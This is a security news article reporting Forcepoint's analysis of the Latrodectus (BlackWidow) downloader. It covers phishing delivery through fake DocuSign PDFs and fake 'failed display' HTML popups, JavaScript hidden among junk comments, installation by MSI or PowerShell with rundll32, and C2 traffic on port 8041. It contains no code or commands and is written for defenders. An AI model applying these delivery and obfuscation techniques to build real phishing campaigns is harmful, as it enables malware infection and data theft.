The Latrodectus malware has been increasingly used by cybercriminals, with recent campaigns targeting the financial, automotive and healthcare sectors, according to a Forcepoint analysis.
Latrodectus (aka BlackWidow) is a downloader first detected in October 2023. It is thought to have been developed by LunarSpider, a threat actor who developed IcedID (aka BokBot) and who has been associated with WizardSpider (by CrowdStrike).
The malware is primarily delivered by email phishing attachments, either in PDF or HTML format, that result in infection. Successful installation of the malware can lead to PII exfiltration, financial loss through fraud or extortion, and the compromise of sensitive information.
The attack is delivered via a compromised email that contains the delivery method disguised either as a DocuSign request in the PDF delivery variant, or as a ‘failed display’ popup in the HTML variant. If the victim clicks the link to access the attached document, obfuscated JavaScript downloads a DLL that results in the installation of the Latrodectus backdoor.
The primary difference between the attackers’ PDF and HTML delivery is that the former uses an MSI installer downloaded by the JavaScript, while the latter attempts to use PowerShell to install the DLL directly.
The malicious code is obfuscated within the attachment’s JavaScript by including a large quantity of junk comments. The individual malcode lines, distributed within the meaningless lines, are indicated by additional initial ‘/’ characters. Removing the junk messages leaves the actual malicious code. In the PDF attack, this creates an ActiveXObject(“WindowsInstaller.Installer”) and downloads a .msi installer file.
The MSI file is run by the JavaScript, dropping a malicious DLL which is then run by rundll32.exe. The end result is another DLL payload unpacked in memory. It is this that connects to the C2 server via the somewhat unusual port 8041.
In the HTML delivery method, trying to access the file attachment causes a fake Windows popup. It claims the browser being used doesn’t support ‘correct offline display’ – but this can be solved by clicking a (fake) ‘Solution’ button. The JavaScript causing this is obfuscated by the text message being stored in reverse order.
The attackers’ so-called solution is to unknowingly download and install Latrodectus. The JavaScript attempts to use PowerShell to directly download and execute the malicious DLL payload using rundll32.exe without resorting to MSI.
“Threat actors continue to use older emails to target users via suspicious PDF or HTML attachments,” write the researchers in a Forcepoint analysis. “They use a redirection method with URL shorteners and host malicious payloads on well-known storage[.]googleapis[.]com hosting projects.”
The Forcepoint analysis also includes IoCs comprising lists of known C2 domains and initial stage URLs associated with the Latrodectus phishing.
Related: Be Aware of These Eight Underrated Phishing Techniques
Related: Ukrainian Sentenced to Prison in US for Role in Zeus, IcedID Malware Operations
Related: IcedID Trojan Operators Experimenting With New Delivery Methods
